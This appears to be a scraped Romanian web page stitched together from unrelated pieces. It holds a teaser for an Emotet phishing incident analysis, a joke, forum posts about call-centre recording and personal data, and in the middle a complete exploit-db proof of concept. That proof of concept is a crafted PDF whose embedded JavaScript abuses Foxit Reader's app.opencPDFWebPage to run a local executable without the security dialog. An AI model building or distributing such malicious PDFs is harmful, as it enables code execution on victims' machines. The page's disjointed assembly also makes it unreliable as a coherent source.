Leaderboard

Atac EMOTET asupra CV19 admin_cv19 November 2, 2020 Securitate Cibernetica 0 EMOTET O Imagine de ansamblu a atacului asupra CV19 Analiză realizată de Alexandru Anghelus si Radu Stanescu Miercuri, 14 octombrie 2020, la 6 zile după prezentarea susținută de CERT RO împreună cu grupul Cyber Volunteers 19 despre securitatea cibernetică a spitalelor din România, am primit pe adresa de mail (contact@cv19.ro) un mesaj aparent inofensiv însă…alertele de securitate au explodat! Semnele de întrebare au apărut în momentul în care am un text legat de o factura emisă în baza… unui contract inexistent. S-a declanșat imediat procedura de Incident Response și am început investigația. Haideți să ”vedem” factura” La deschiderea fișierului putem observa un așa zis mesaj necesar pentru actualizarea sistemului de operare, unul ce ne informează că anumite aplicații au nevoie de update, menționând utilitarul Microsoft Word cu îndemnul de a acorda acces pentru editarea documentului. Putem spune că pentru vizualizarea acestui document era necesar să facem destul de multe operațiuni, deși în mod normal …ar fi trebuit să se deschidă și … atât! Avem de-a face cu un text scris la o scară foarte mică și total de neînțeles, dar dacă îl mărim putem vedea că este un text generat și…fără logică. Articol complet: https://cv19.ro/resurse/securitate-cibernetica/atac-emotet-asupra-cv19/

Soție: "Noul nostru vecin își sărută mereu soția când pleacă la serviciu. De ce nu faci asta?" Soț: "Cum pot? Nici măcar nu o cunosc."

# Exploit Title: Foxit Reader 9.7.1 - Remote Command Execution (Javascript API) # Exploit Author: Nassim Asrir # Vendor Homepage: https://www.foxitsoftware.com/ # Description: Foxit Reader before 10.0 allows Remote Command Execution via the unsafe app.opencPDFWebPage JavaScript API which allows an attacker to execute local files on the file system and bypass the security dialog. The exploit process need the user-interaction (Opening the PDF) . + Process continuation #POC %PDF-1.4 %ÓôÌá 1 0 obj << /CreationDate(D:20200821171007+02'00') /Title(Hi, Can you see me ?) /Creator(AnonymousUser) >> endobj 2 0 obj << /Type/Catalog /Pages 3 0 R /Names << /JavaScript 10 0 R >> >> endobj 3 0 obj << /Type/Pages /Count 1 /Kids[4 0 R] >> endobj 4 0 obj << /Type/Page /MediaBox[0 0 595 842] /Parent 3 0 R /Contents 5 0 R /Resources << /ProcSet [/PDF/Text/ImageB/ImageC/ImageI] /ExtGState << /GS0 6 0 R >> /Font << /F0 8 0 R >> >> /Group << /CS/DeviceRGB /S/Transparency /I false /K false >> >> endobj 5 0 obj << /Length 94 /Filter/FlateDecode >> stream xœŠ»@@EûùŠ[RØk ­x•ÄüW"DDçëœâžÜœ›b°ý“{‡éTg†¼tS)dÛ‘±=dœþ+9Ÿ_ÄifÔÈŒ [ŽãB_5!d§ZhP>¯ ‰ endstream endobj 6 0 obj << /Type/ExtGState /ca 1 >> endobj 7 0 obj << /Type/FontDescriptor /Ascent 833 /CapHeight 592 /Descent -300 /Flags 32 /FontBBox[-192 -710 702 1221] /ItalicAngle 0 /StemV 0 /XHeight 443 /FontName/CourierNew,Bold >> endobj 8 0 obj << /Type/Font /Subtype/TrueType /BaseFont/CourierNew,Bold /Encoding/WinAnsiEncoding /FontDescriptor 7 0 R /FirstChar 0 /LastChar 255 /Widths[600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600] >> endobj 9 0 obj << /S/JavaScript /JS(app.opencPDFWebPage\('C:\\\\Windows\\\\System32\\\\calc.exe'\) ) >> endobj 10 0 obj << /Names[(EmbeddedJS)9 0 R] >> endobj xref 0 11 0000000000 65535 f 0000000015 00000 n 0000000170 00000 n 0000000250 00000 n 0000000305 00000 n 0000000560 00000 n 0000000724 00000 n 0000000767 00000 n 0000000953 00000 n 0000002137 00000 n 0000002235 00000 n trailer << /ID[<7018DE6859F23E419162D213F5C4D583><7018DE6859F23E419162D213F5C4D583>] /Info 1 0 R /Root 2 0 R /Size 11 >> startxref 2283 %%EOF Source exploit-db.com

Am fost sunat de catre cineva de la compania de telecomunicatii si am patit acest lucru, dar asta se intampla de fiecare data, indiferent ca e vorba de un serviciu, o banca si mai stiu eu ce. Mi se par doua lucruri idioate: 1. Ma pune sa fiu de acord ca apelul sa fie inregistrat cand eu sunt cel apelat 2. Imi cere o data personala (sigur, nu CNP, lucruri mai marunte gen data nasterii) dar nu mi se pare normal sa le dau unei persoane la intamplare care ma suna Eu de obicei ii intreb si pe ei daca sunt de acord ca apelul sa fie inregistrat (desi nu fac asta) si sa imi confirme ca sunt de la serviciul respectiv si ca au anumite date despre mine. Uneori a mers. Problema e urmatoarea: majoritatea inchid (si se mai si supara pe mine ) si e posibil sa nu aflu lucruri utile. Am patit asta la banca, dar am avut noroc ca am primit si SMS. Voi ce parere aveti despre asta? Sunt prea paranoic? Voi ce faceti? Cum e din punct de vedere legal? Pe de-o parte inteleg ca imi protejeaza datele personale, pe de alta parte nu prea.

Daca nu te informeaza ca te inregistreaza nu pot folosi acea inregistrare in caz de reclamatii, confirmare, judecata sau orice alta situatie. La fel cum nici tu nu o poti folosi daca nu anunti, cel putin ANPC asta mi-a comunicat cand am avut o situatie cu emag si le-am zis ca am inregistrarea apelului. Eu personal inregistrez toate apelurile, aparent pe Huawei e o functie din telefon fara batai de cap ce functioneaza mereu. Cand nu aveam timp/chef de vorba o aruncam pe asta cu apel inregistrat si inchideau, insa in ultima perioada vad ca nu mai inchid apelul asa multi si intr-un fel ma bucur. Am sesizat insa altceva, mai nou cand te suna cineva din callcenter nu iti mai zice robotul treaba cu inregistratul. Se prezinta persoana si iti zice ce vrea sa iti vanda/modifice si apoi iti arunca treaba cu apelul inregistrat. Lucru mult mai ok. Firmele de duzina, gen DPD, probabil ca merg la "rupere" si la "clientul pierde nu eu". Nu vreau sa stiu ce minte sclipitoare de la DPD a venit cu ideea sa iti arunce mesajul cu inregistrarea apelului cand te suna curierul. Si daca nu esti ok cu asta si inchizi apelul cum te mai contacteaza sa iti livreze? Cu datele personale la telefon iar nu sunt ok, poti sa fi intr-un loc aglomerat si toata lumea iti aude datele personale. Doar eu am patit sa ii aud unuia tot buletinul? Apoi poate sunt paranoic, insa am un catchall pe un domeniu si la fiecare contract am dat cate o adresa de mail unica. Am patit sa ma sune firme dubioase si asa mi-am dat seama de unde au datele mele. Funny story, am fost sunat de curand sa actualizez datele personale ca sa imi poata furniza serviciile in continuare si pentru ca pandemie e ok si telefonic. Prima intrebare a operatorului foarte bine instruit a fost: Data nasterii ramane aceiasi?

Eu am avut probleme cu enel, care imi "pierduse" niste documente cu caracter personal (copie ci, copie contract casa samd). Desi le dadusem unui agent enel, cand ii tot sunam sa clarific ma puneau sa retrimit. De fiecare data imi comunica robotul ca telefonul este inregistrat. Dupa ce 7 operatori s-au facut ca ploua, am facut plangere la autoritatea care se ocupa cu datele cu caracter personal, le-am dat ora si minutul apelului. In 2 zile m-a sunat enel, cerandu-si scuze ca au ratacit actele si mi-au mai spus ca nu au salvat inregistrarile apelurilor, sac. Din ce stiu, pentru a inregistra apeluri trebuie sa fii operator de date cu caracter personal. 1.trebuie sa fii defapt de acord ca ei sa stocheze inregistrarea telefonica. 2.iti cer ceva care nu e atat de periculos de scurs ca cnpul. Cum ar fi data nasterii sau mail sau adresa. O alta problema mai veche e ca banca (raiff...) vindea datele catre firme de asigurari si m-am trezit sunat de defuncta alico sa imi prezinte o asigurare de viata/sanatate/accident fara sa fiu informat de banca in prealabil ca vor impartasi datele mele personale cu terti. (Aceasta intamplare a fost cu ceva timp inainte de gdpr).